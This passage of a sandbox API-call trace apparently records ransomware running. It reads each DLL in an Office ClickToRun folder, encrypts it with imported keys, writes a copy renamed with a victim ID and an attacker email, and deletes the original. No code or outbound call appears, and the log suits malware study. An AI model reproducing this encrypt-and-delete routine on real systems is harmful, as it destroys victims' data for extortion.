dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.980] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.980] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.981] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0141.981] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.981] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x48c0, lpOverlapped=0x0) returned 1 [0141.985] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x48d0, dwBufLen=0x48d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x48d0) returned 1 [0141.985] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x48d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x48d0, lpOverlapped=0x0) returned 1 [0141.986] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3270) returned 1 [0141.986] CryptSetKeyParam (hKey=0xac3270, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.986] CryptEncrypt (in: hKey=0xac3270, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0141.986] CryptDestroyKey (hKey=0xac3270) returned 1 [0141.986] WriteFile (in: hFile=0x2d8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0141.986] CryptDestroyKey (hKey=0xac2df0) returned 1 [0141.986] CloseHandle (hObject=0x2f4) returned 1 [0141.986] CloseHandle (hObject=0x2d8) returned 1 [0141.987] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-timezone-l1-1-0.dll")) returned 1 [0141.988] SetEvent (hEvent=0x288) returned 1 [0141.989] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0141.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.989] GetFileSizeEx (in: hFile=0x2d8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19648) returned 1 [0141.989] CloseHandle (hObject=0x2d8) returned 1 [0141.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 0x20 [0141.989] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0141.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d8 [0141.989] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.989] SetFilePointerEx (in: hFile=0x2d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0141.989] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0141.990] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2f70) returned 1 [0141.990] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0141.990] ReadFile (in: hFile=0x2d8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4cc0, lpOverlapped=0x0) returned 1 [0141.999] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4cd0) returned 1 [0141.999] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4cd0, lpOverlapped=0x0) returned 1 [0142.000] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2e30) returned 1 [0142.000] CryptSetKeyParam (hKey=0xac2e30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.000] CryptEncrypt (in: hKey=0xac2e30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0142.000] CryptDestroyKey (hKey=0xac2e30) returned 1 [0142.000] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0142.000] CryptDestroyKey (hKey=0xac2f70) returned 1 [0142.000] CloseHandle (hObject=0x2d8) returned 1 [0142.000] CloseHandle (hObject=0x2f4) returned 1 [0142.073] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-conio-l1-1-0.dll")) returned 1 [0142.074] SetEvent (hEvent=0x288) returned 1 [0142.074] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.331] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19136) returned 1 [0142.331] CloseHandle (hObject=0x2f0) returned 1 [0142.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 0x20 [0142.332] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.332] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.332] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.332] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac30f0) returned 1 [0142.332] CryptSetKeyParam (hKey=0xac30f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.332] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4ac0, lpOverlapped=0x0) returned 1 [0142.334] CryptEncrypt (in: hKey=0xac30f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0) returned 1 [0142.334] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4ad0, lpOverlapped=0x0) returned 1 [0142.336] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32f0) returned 1 [0142.336] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.336] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.336] CryptDestroyKey (hKey=0xac32f0) returned 1 [0142.336] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.336] CryptDestroyKey (hKey=0xac30f0) returned 1 [0142.336] CloseHandle (hObject=0x2f0) returned 1 [0142.336] CloseHandle (hObject=0x2f4) returned 1 [0142.337] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll")) returned 1 [0142.338] SetEvent (hEvent=0x288) returned 1 [0142.338] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.338] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.339] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=20672) returned 1 [0142.339] CloseHandle (hObject=0x2f4) returned 1 [0142.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 0x20 [0142.339] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.339] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.339] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.339] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac34b0) returned 1 [0142.339] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.339] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x50c0, lpOverlapped=0x0) returned 1 [0142.341] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50d0, dwBufLen=0x50d0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50d0) returned 1 [0142.341] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x50d0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x50d0, lpOverlapped=0x0) returned 1 [0142.343] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d30) returned 1 [0142.343] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.343] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x70, dwBufLen=0x70 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x70) returned 1 [0142.343] CryptDestroyKey (hKey=0xac2d30) returned 1 [0142.343] WriteFile (in: hFile=0x2f0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x122, lpOverlapped=0x0) returned 1 [0142.343] CryptDestroyKey (hKey=0xac34b0) returned 1 [0142.343] CloseHandle (hObject=0x2f4) returned 1 [0142.343] CloseHandle (hObject=0x2f0) returned 1 [0142.344] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-filesystem-l1-1-0.dll")) returned 1 [0142.345] SetEvent (hEvent=0x288) returned 1 [0142.346] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.346] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19648) returned 1 [0142.346] CloseHandle (hObject=0x2f0) returned 1 [0142.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 0x20 [0142.346] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.346] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.346] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.346] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.346] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac34b0) returned 1 [0142.347] CryptSetKeyParam (hKey=0xac34b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.347] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4cc0, lpOverlapped=0x0) returned 1 [0142.348] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4cd0, dwBufLen=0x4cd0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4cd0) returned 1 [0142.348] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4cd0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4cd0, lpOverlapped=0x0) returned 1 [0142.350] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32f0) returned 1 [0142.350] CryptSetKeyParam (hKey=0xac32f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.350] CryptEncrypt (in: hKey=0xac32f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x60, dwBufLen=0x60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x60) returned 1 [0142.350] CryptDestroyKey (hKey=0xac32f0) returned 1 [0142.350] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x112, lpOverlapped=0x0) returned 1 [0142.350] CryptDestroyKey (hKey=0xac34b0) returned 1 [0142.350] CloseHandle (hObject=0x2f0) returned 1 [0142.350] CloseHandle (hObject=0x2f4) returned 1 [0142.351] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-heap-l1-1-0.dll")) returned 1 [0142.352] SetEvent (hEvent=0x288) returned 1 [0142.352] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0142.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.353] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=19136) returned 1 [0142.353] CloseHandle (hObject=0x2f4) returned 1 [0142.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll")) returned 0x20 [0142.353] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0142.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0142.353] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.353] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0142.353] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-locale-l1-1-0.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-locale-l1-1-0.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0142.353] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0142.354] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0142.354] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4ac0, lpOverlapped=0x0) returned 1 [0142.356] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0, dwBufLen=0x4ad0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4ad0) returned 1 